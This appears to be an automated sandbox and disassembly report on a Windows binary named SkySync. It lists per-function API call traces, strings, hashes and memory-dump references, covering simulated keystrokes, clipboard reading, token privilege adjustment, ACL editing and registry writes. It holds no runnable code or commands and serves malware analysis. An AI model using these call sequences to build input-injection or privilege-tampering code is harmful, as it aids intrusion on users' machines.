GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00ABA214
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00ABA227
GetProcAddress.KERNEL32(00000000,GetLogicalProcessorInformation), ref: 00ABA23A
GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00ABA24D
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00ABA260
GetProcAddress.KERNEL32(00000000,EnumSystemLocalesEx), ref: 00ABA273
GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00ABA286
GetProcAddress.KERNEL32(00000000,GetDateFormatEx), ref: 00ABA299
GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00ABA2AC
GetProcAddress.KERNEL32(00000000,GetTimeFormatEx), ref: 00ABA2BF
GetProcAddress.KERNEL32(00000000,GetUserDefaultLocaleName), ref: 00ABA2D2
GetProcAddress.KERNEL32(00000000,IsValidLocaleName), ref: 00ABA2E5
GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00ABA2F8
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00ABA30B
GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00ABA31E
GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleExW), ref: 00ABA331
GetProcAddress.KERNEL32(00000000,SetFileInformationByHandleW), ref: 00ABA344

Strings

IsValidLocaleName, xrefs: 00ABA2DA
GetTimeFormatEx, xrefs: 00ABA2B4
GetFileInformationByHandleExW, xrefs: 00ABA32B
GetCurrentPackageId, xrefs: 00ABA300
CreateThreadpoolTimer, xrefs: 00ABA171
CloseThreadpoolTimer, xrefs: 00ABA1AA
SetDefaultDllDirectories, xrefs: 00ABA255
CreateEventExW, xrefs: 00ABA138
CreateThreadpoolWait, xrefs: 00ABA1BD
FreeLibraryWhenCallbackReturns, xrefs: 00ABA209
CreateSemaphoreExW, xrefs: 00ABA14B
FlsAlloc, xrefs: 00ABA0DE
FlsSetValue, xrefs: 00ABA112
GetUserDefaultLocaleName, xrefs: 00ABA2C7
InitializeCriticalSectionEx, xrefs: 00ABA125
LCMapStringEx, xrefs: 00ABA2ED
FlsGetValue, xrefs: 00ABA0FF
CloseThreadpoolWait, xrefs: 00ABA1E3
GetCurrentProcessorNumber, xrefs: 00ABA21C
SetThreadStackGuarantee, xrefs: 00ABA15E
CreateSymbolicLinkW, xrefs: 00ABA242
SetThreadpoolTimer, xrefs: 00ABA184
EnumSystemLocalesEx, xrefs: 00ABA268
WaitForThreadpoolTimerCallbacks, xrefs: 00ABA197
SetFileInformationByHandleW, xrefs: 00ABA339
SetThreadpoolWait, xrefs: 00ABA1D0
CompareStringEx, xrefs: 00ABA27B
GetTickCount64, xrefs: 00ABA313
GetLocaleInfoEx, xrefs: 00ABA2A1
kernel32.dll, xrefs: 00ABA0CB
GetLogicalProcessorInformation, xrefs: 00ABA22F
FlushProcessWriteBuffers, xrefs: 00ABA1FB
GetDateFormatEx, xrefs: 00ABA28E
FlsFree, xrefs: 00ABA0EC

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: AddressProc$EncodePointer$HandleModule
String ID: CloseThreadpoolTimer$CloseThreadpoolWait$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$EnumSystemLocalesEx$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetDateFormatEx$GetFileInformationByHandleExW$GetLocaleInfoEx$GetLogicalProcessorInformation$GetTickCount64$GetTimeFormatEx$GetUserDefaultLocaleName$InitializeCriticalSectionEx$IsValidLocaleName$LCMapStringEx$SetDefaultDllDirectories$SetFileInformationByHandleW$SetThreadStackGuarantee$SetThreadpoolTimer$SetThreadpoolWait$WaitForThreadpoolTimerCallbacks$kernel32.dll
API String ID: 2375030495-2934716456
Opcode ID: 04938ca22864651dbb6a25fb6953815935d27009dc65880e010425834752cb2b
Instruction ID: 59bacc576420d5abb77dc6d44604c0b82ae8a1131a2d8756ec63e4528ef50d22
Opcode Fuzzy Hash: 04938ca22864651dbb6a25fb6953815935d27009dc65880e010425834752cb2b
Instruction Fuzzy Hash: BE617771960728AA8700EFF5BC45F2BBFF8BB55B0274419AEA914E35B1DFB4A1008F54

Function 00B1D164 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00A929E2: GetWindowLongW.USER32(?,000000EB), ref: 00A929F3

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00B1D208
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B1D249
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00B1D28E
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B1D2B8
SendMessageW.USER32 ref: 00B1D2E1
GetKeyState.USER32(00000011), ref: 00B1D37A
GetKeyState.USER32(00000009), ref: 00B1D387
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B1D39D
GetKeyState.USER32(00000010), ref: 00B1D3A7
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B1D3D0
SendMessageW.USER32 ref: 00B1D3F7
SendMessageW.USER32(?,00001030,?,00B1B9BA), ref: 00B1D4FD
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00B1D513
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00B1D526
SetCapture.USER32(?), ref: 00B1D52F
ClientToScreen.USER32(?,?), ref: 00B1D594
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00B1D5A1
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B1D5BB
ReleaseCapture.USER32 ref: 00B1D5C6
GetCursorPos.USER32(?), ref: 00B1D600
ScreenToClient.USER32(?,?), ref: 00B1D60D
SendMessageW.USER32(?,00001012,00000000,?), ref: 00B1D669
SendMessageW.USER32 ref: 00B1D697
SendMessageW.USER32(?,00001111,00000000,?), ref: 00B1D6D4
SendMessageW.USER32 ref: 00B1D703
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B1D724
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B1D733
GetCursorPos.USER32(?), ref: 00B1D753
ScreenToClient.USER32(?,?), ref: 00B1D760
GetParent.USER32(?), ref: 00B1D780
SendMessageW.USER32(?,00001012,00000000,?), ref: 00B1D7E9
SendMessageW.USER32 ref: 00B1D81A
ClientToScreen.USER32(?,?), ref: 00B1D878
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B1D8A8
SendMessageW.USER32(?,00001111,00000000,?), ref: 00B1D8D2
SendMessageW.USER32 ref: 00B1D8F5
ClientToScreen.USER32(?,?), ref: 00B1D947
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B1D97B

Part of subcall function 00A929AB: GetWindowLongW.USER32(?,000000EB), ref: 00A929BC

GetWindowLongW.USER32(?,000000F0), ref: 00B1DA17

Strings

@GUI_DRAGID, xrefs: 00B1D562
F, xrefs: 00B1D8FB

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F
API String ID: 3429851547-4164748364
Opcode ID: 5d95c79113a85cabcbe5770149072c9429dfc92d4198ef328fc816d2109eb401
Instruction ID: d247ec85bc44a3538f593fe27c4b4ca21f8a7e2ed0ff53e512b0f3a0f2a7e962
Opcode Fuzzy Hash: 5d95c79113a85cabcbe5770149072c9429dfc92d4198ef328fc816d2109eb401
Instruction Fuzzy Hash: 7642C131208341AFDB21DF28C884FAABBE5FF49310F540699F655972A1CB71DC99CB91

Function 00AC5CAC Relevance: 49.2, APIs: 22, Strings: 6, Instructions: 171libraryloaderCOMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00B55388,00000000,?,?,?,?,?,00ABA53D,00B55388,Microsoft Visual C++ Runtime Library,00012010), ref: 00AC5CD4
LoadLibraryExW.KERNEL32(USER32.DLL,00000000,00000800,?,?,?,?,?,00ABA53D,00B55388,Microsoft Visual C++ Runtime Library,00012010), ref: 00AC5CFA
GetLastError.KERNEL32(?,?,?,?,?,00ABA53D,00B55388,Microsoft Visual C++ Runtime Library,00012010), ref: 00AC5D06
LoadLibraryExW.KERNEL32(USER32.DLL,00000000,00000000,?,?,?,?,?,00ABA53D,00B55388,Microsoft Visual C++ Runtime Library,00012010), ref: 00AC5D1C
GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 00AC5D32
EncodePointer.KERNEL32(00000000,?,?,?,?,?,00ABA53D,00B55388,Microsoft Visual C++ Runtime Library,00012010), ref: 00AC5D41
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00AC5D4E
EncodePointer.KERNEL32(00000000,?,?,?,?,?,00ABA53D,00B55388,Microsoft Visual C++ Runtime Library,00012010), ref: 00AC5D55
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00AC5D62
EncodePointer.KERNEL32(00000000,?,?,?,?,?,00ABA53D,00B55388,Microsoft Visual C++ Runtime Library,00012010), ref: 00AC5D69
GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 00AC5D76
EncodePointer.KERNEL32(00000000,?,?,?,?,?,00ABA53D,00B55388,Microsoft Visual C++ Runtime Library,00012010), ref: 00AC5D7D
GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00AC5D8E
EncodePointer.KERNEL32(00000000,?,?,?,?,?,00ABA53D,00B55388,Microsoft Visual C++ Runtime Library,00012010), ref: 00AC5D95
IsDebuggerPresent.KERNEL32(?,?,?,?,?,00ABA53D,00B55388,Microsoft Visual C++ Runtime Library,00012010), ref: 00AC5D9F
OutputDebugStringW.KERNEL32(?,?,?,?,?,?,00ABA53D,00B55388,Microsoft Visual C++ Runtime Library,00012010), ref: 00AC5DB1
DecodePointer.KERNEL32(?,?,?,?,?,00ABA53D,00B55388,Microsoft Visual C++ Runtime Library,00012010), ref: 00AC5DCF
DecodePointer.KERNEL32(00000000,?,?,?,?,?,00ABA53D,00B55388,Microsoft Visual C++ Runtime Library,00012010), ref: 00AC5DF1
DecodePointer.KERNEL32(?,?,?,?,?,00ABA53D,00B55388,Microsoft Visual C++ Runtime Library,00012010), ref: 00AC5DFC
DecodePointer.KERNEL32(00000000,?,?,?,?,?,00ABA53D,00B55388,Microsoft Visual C++ Runtime Library,00012010), ref: 00AC5E41
DecodePointer.KERNEL32(00000000,?,?,?,?,?,00ABA53D,00B55388,Microsoft Visual C++ Runtime Library,00012010), ref: 00AC5E59
DecodePointer.KERNEL32(?,?,?,?,?,00ABA53D,00B55388,Microsoft Visual C++ Runtime Library,00012010), ref: 00AC5E6D

Strings

USER32.DLL, xrefs: 00AC5CF5, 00AC5D17
GetLastActivePopup, xrefs: 00AC5D57
GetActiveWindow, xrefs: 00AC5D43
MessageBoxW, xrefs: 00AC5D2C
GetUserObjectInformationW, xrefs: 00AC5D6B
GetProcessWindowStation, xrefs: 00AC5D88

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Pointer$DecodeEncode$AddressProc$LibraryLoad$DebugDebuggerErrorLastOutputPresentString
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
API String ID: 3166169540-564504941
Opcode ID: fbf6a401d7add3cd4f113542d47a77cc9076b8aa3ab4df1b0346cabda137034a
Instruction ID: 488d54abf9d41319caffdcc14cb59d4b65d6ad6d5716a99da559d546ebd8d890
Opcode Fuzzy Hash: fbf6a401d7add3cd4f113542d47a77cc9076b8aa3ab4df1b0346cabda137034a
Instruction Fuzzy Hash: 22514F31D00706ABDB21EBB99C88FAE77B8AF48751B590469F505E3191DF30ED81CB61

Function 00AA5EDA Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00AA5EE2
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AE10D7
IsIconic.USER32(?), ref: 00AE10E0
ShowWindow.USER32(?,00000009), ref: 00AE10ED
SetForegroundWindow.USER32(?), ref: 00AE10F7
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00AE110D
GetCurrentThreadId.KERNEL32 ref: 00AE1114
GetWindowThreadProcessId.USER32(?,00000000), ref: 00AE1120
AttachThreadInput.USER32(?,00000000,00000001), ref: 00AE1131
AttachThreadInput.USER32(?,00000000,00000001), ref: 00AE1139
AttachThreadInput.USER32(00000000,?,00000001), ref: 00AE1141
SetForegroundWindow.USER32(?), ref: 00AE1144
MapVirtualKeyW.USER32(00000012,00000000), ref: 00AE1159
keybd_event.USER32(00000012,00000000), ref: 00AE1164
MapVirtualKeyW.USER32(00000012,00000000), ref: 00AE116E
keybd_event.USER32(00000012,00000000), ref: 00AE1173
MapVirtualKeyW.USER32(00000012,00000000), ref: 00AE117C
keybd_event.USER32(00000012,00000000), ref: 00AE1181
MapVirtualKeyW.USER32(00000012,00000000), ref: 00AE118B
keybd_event.USER32(00000012,00000000), ref: 00AE1190
SetForegroundWindow.USER32(?), ref: 00AE1193
AttachThreadInput.USER32(?,?,00000000), ref: 00AE11BA

Strings

Shell_TrayWnd, xrefs: 00AE10D2

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 383e7b050626ab6f70be30e7eceb419fcd67afc03ef940776fd3f8f6a9def125
Instruction ID: b28cdc3224588206b3edcc3a7f6c11ea969e610a3744b1e2188cf9bddb19a462
Opcode Fuzzy Hash: 383e7b050626ab6f70be30e7eceb419fcd67afc03ef940776fd3f8f6a9def125
Instruction Fuzzy Hash: 9B316371A50358BFEB316B629C89F7F7E6CEB44B50F104015FA04AB1D1CAB05D52AFA0

Function 00AE8F2E Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00AE9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AE93E3
Part of subcall function 00AE9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AE9410
Part of subcall function 00AE9399: GetLastError.KERNEL32 ref: 00AE941D

DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00AE8FC3
CloseHandle.KERNEL32(?), ref: 00AE8FD4
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00AE8FEB
GetProcessWindowStation.USER32 ref: 00AE9004
SetProcessWindowStation.USER32(00000000), ref: 00AE900E
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00AE9028

Part of subcall function 00AE8DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AE8F27), ref: 00AE8DFE
Part of subcall function 00AE8DE9: CloseHandle.KERNEL32(?,?,00AE8F27), ref: 00AE8E10

Strings

winsta0, xrefs: 00AE8FE6
default, xrefs: 00AE9023
, xrefs: 00AE8F80

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue
String ID: $default$winsta0
API String ID: 3576815822-1027155976
Opcode ID: b03ea0b22221bfd01745d7fc82de0f0f7e59b5957a5d0be2e747aa037b2c938c
Instruction ID: 93c40f79d777471d15b4dc3b44d1879f4fcd167b525de5c83242e8bf25030715
Opcode Fuzzy Hash: b03ea0b22221bfd01745d7fc82de0f0f7e59b5957a5d0be2e747aa037b2c938c
Instruction Fuzzy Hash: D4815B71910389BFEF21AFA5CD49AEFBB79EF08304F044259F914A6261DB318E15DB60

Function 00B04632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00B20980), ref: 00B0465C
IsClipboardFormatAvailable.USER32(0000000D), ref: 00B0466A
GetClipboardData.USER32(0000000D), ref: 00B04672
CloseClipboard.USER32 ref: 00B0467E
GlobalLock.KERNEL32(00000000), ref: 00B0469A
CloseClipboard.USER32 ref: 00B046A4
GlobalUnlock.KERNEL32(00000000), ref: 00B046B9
IsClipboardFormatAvailable.USER32(00000001), ref: 00B046C6
GetClipboardData.USER32(00000001), ref: 00B046CE
GlobalLock.KERNEL32(00000000), ref: 00B046DB
GlobalUnlock.KERNEL32(00000000), ref: 00B0470F
CloseClipboard.USER32 ref: 00B0481F

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 5fc94dd8d95820d77870cf73fe4a17522206178476c10da3d2d4758ac1a08322
Instruction ID: a6471a8734e79613ee7e8523f7f24bd521d8aba39126785f0257427f04bf2331
Opcode Fuzzy Hash: 5fc94dd8d95820d77870cf73fe4a17522206178476c10da3d2d4758ac1a08322
Instruction Fuzzy Hash: 29519AB1204301ABD311FF60DD89F6E7BE8AB85B50F004569F656931E2EF70D9068B62

Function 00B10EB7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B10FB3
RegCreateKeyExW.ADVAPI32(?,?,00000000,00B20980,00000000,?,00000000,?,?), ref: 00B11021
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00B11069
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00B110F2
RegCloseKey.ADVAPI32(?), ref: 00B11412
RegCloseKey.ADVAPI32(00000000), ref: 00B1141F

Strings

REG_MULTI_SZ, xrefs: 00B111DA
REG_QWORD, xrefs: 00B11360
REG_BINARY, xrefs: 00B113AD
REG_EXPAND_SZ, xrefs: 00B1108F
REG_DWORD, xrefs: 00B112E3
REG_SZ, xrefs: 00B11130

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: cbe204df1c7daf658d80ae4097115f337e1d3f1bca03691a3ee7a02cfbca47c9
Instruction ID: d3cb15df9c7a6641e2a4d18d8d2bc40a0f4e8a060f7112c39fce01eed26a39dd
Opcode Fuzzy Hash: cbe204df1c7daf658d80ae4097115f337e1d3f1bca03691a3ee7a02cfbca47c9
Instruction Fuzzy Hash: 87029F752046019FCB14EF29C981E6AB7E5FF89714F04895CF9999B3A2DB30EC42CB91

Function 00AFF5D8 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,779B8FB0,?,00000000), ref: 00AFF5F9
GetFileAttributesW.KERNEL32(?), ref: 00AFF637
SetFileAttributesW.KERNEL32(?,?), ref: 00AFF651
FindNextFileW.KERNEL32(00000000,?), ref: 00AFF669
FindClose.KERNEL32(00000000), ref: 00AFF674
FindFirstFileW.KERNEL32(*.*,?), ref: 00AFF690
SetCurrentDirectoryW.KERNEL32(?), ref: 00AFF6E0
SetCurrentDirectoryW.KERNEL32(00B4B578), ref: 00AFF6FE
FindNextFileW.KERNEL32(00000000,00000010), ref: 00AFF708
FindClose.KERNEL32(00000000), ref: 00AFF715
FindClose.KERNEL32(00000000), ref: 00AFF727

Strings

*.*, xrefs: 00AFF68B

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 0b5f4c9f343b530ce852dbd5856cbc162938a25790fc79d6e8ab3bd2f926d09d
Instruction ID: 89376a6b626720ee3d4d49aae68b0f95f933f6f612a8d6475227690cd47ab095
Opcode Fuzzy Hash: 0b5f4c9f343b530ce852dbd5856cbc162938a25790fc79d6e8ab3bd2f926d09d
Instruction Fuzzy Hash: 7431637254121DAFDF20ABB49C4DAEEB7AC9F19321F100165F944E31A1EF70DA45DB60

Function 00AE88CD Relevance: 19.7, APIs: 13, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AE8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AE8E3C
Part of subcall function 00AE8E20: GetLastError.KERNEL32(?,00AE8900,?,?,?), ref: 00AE8E46
Part of subcall function 00AE8E20: GetProcessHeap.KERNEL32(00000008,?,?,00AE8900,?,?,?), ref: 00AE8E55
Part of subcall function 00AE8E20: HeapAlloc.KERNEL32(00000000,?,00AE8900,?,?,?), ref: 00AE8E5C
Part of subcall function 00AE8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AE8E73

Part of subcall function 00AE8EBD: GetProcessHeap.KERNEL32(00000008,00AE8916,00000000,00000000,?,00AE8916,?), ref: 00AE8EC9
Part of subcall function 00AE8EBD: HeapAlloc.KERNEL32(00000000,?,00AE8916,?), ref: 00AE8ED0
Part of subcall function 00AE8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00AE8916,?), ref: 00AE8EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AE8931
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AE8965
GetLengthSid.ADVAPI32(?), ref: 00AE8976
GetAce.ADVAPI32(?,00000000,?), ref: 00AE89B3
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AE89CF
GetLengthSid.ADVAPI32(?), ref: 00AE89EC
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00AE89FB
HeapAlloc.KERNEL32(00000000), ref: 00AE8A02
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AE8A23
CopySid.ADVAPI32(00000000), ref: 00AE8A2A
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AE8A5B
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AE8A81
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AE8A95

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 1795222879-0
Opcode ID: 81ebb2c1cc84072acb4a1335553ba4666bc21f18218f7b2c723b11fe81a81f74
Instruction ID: 12bb5a8a201a95a3d4cac0efdfec231916af64595e79037dd5321e7a55f946f3
Opcode Fuzzy Hash: 81ebb2c1cc84072acb4a1335553ba4666bc21f18218f7b2c723b11fe81a81f74
Instruction Fuzzy Hash: 98614871910249BFDF10DFA6DC85EAEBB79FF04300F04816AE919A7291DB399A05CB60

Function 00AFF735 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,779B8FB0,?,00000000), ref: 00AFF756
FindNextFileW.KERNEL32(00000000,?), ref: 00AFF7B1
FindClose.KERNEL32(00000000), ref: 00AFF7BC
